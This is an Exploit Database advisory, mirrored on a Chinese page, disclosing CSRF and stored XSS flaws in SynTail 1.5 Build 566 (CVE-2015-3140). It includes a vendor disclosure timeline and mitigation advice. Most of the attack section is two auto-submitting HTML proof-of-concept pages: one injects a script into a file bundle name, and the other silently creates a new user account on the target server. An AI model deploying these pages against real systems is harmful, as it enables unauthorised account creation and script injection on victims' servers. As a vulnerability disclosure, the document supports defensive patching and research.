SynTail 1.5 Build 566 – Multiple Vulnerabilities

• Exploit Database
• 87 阅读

• 作者： Marlow Tannhauser
  日期： 2015-05-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36953/

• # Exploit Title: Multiple vulnerabilities in SynTail 1.5 Build 566 (CSRF/Stored XSS)
  # Date: 07-05-2015
  # Exploit Author: Marlow Tannhauser
  # Contact: marlowtannhauser@gmail.com
  # Vendor Homepage: http://www.synametrics.com
  # Software Link: http://web.synametrics.com/SynTailDownload.htm
  # Version: 1.5 Build 566. Earlier versions may also be affected.
  # CVE: 2015-3140
  # Category: Web apps
  
  
  # DISCLOSURE TIMELINE #
  08/02/2015: Initial disclosure to vendor and CERT
  09/02/2015: Acknowledgment of vulnerabilities from vendor
  11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor
  19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request
  09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request
  20/04/2015: Confirmation of fix from vendor
  07/05/2015: Disclosure
  
  Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage.
  
  
  # EXPLOIT DESCRIPTION #
  SynTail 1.5 Build 566 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests.
  
  
  # POC 1 #
  The following PoC uses the CSRF vulnerability to create a new file bundle, and combines it with one of the stored XSS vulnerabilities
  
  <html>
  <body>
  <form name="evilform" method="post" action="http://192.168.0.8:9555/app">
  <input type="hidden" name="friendlyName" value="<script>alert("Marlow")</script> />
  <input type="hidden" name="selectedPath" value="/home/" />
  <input type="hidden" name="showFiles" value="true" />
  <input type="hidden" name="st" value="addfb" />
  <input type="hidden" name="operation" value="mngFB" />
  </form>
  <script type="text/javascript">
  document.evilform.submit();
  </script>
  </body>
  </html> 
  
  
  # POC 2 #
  The following PoC uses the CSRF vulnerability to create a new user with the details shown
  
  <html>
  <body>
  <form name="evilform" method="post" action="http://192.168.1.245:9555/app?operation=mngUsers">
  <input type="hidden" name="fullName" value="marlow" />
  <input type="hidden" name="email" value="marlow@marlow.com" />
  <input type="hidden" name="password" value="marlow" />
  <input type="hidden" name="showFiles" value="true" />
  <input type="hidden" name="st" value="addfb" />
  <input type="hidden" name="operation" value="mngUsers" />
  </form>
  <script type="text/javascript">
  document.evilform.submit();
  </script>
  </body>
  </html> 
  
  
  # STORED XSS VULNERABILITIES #
  Stored XSS vulnerabilities are present in the following fields:
  
  Manage Users > Create a new user > Full name field and Email field
  Example URL: POST request
  
  Manage file bundles > Create a new file bundle > Friendly name field and File path field
  Example URL: POST request
  
  
  # MITIGATION #
  Upgrade to the latest build of SynTail, available from the link shown.
  

  Python

  Copy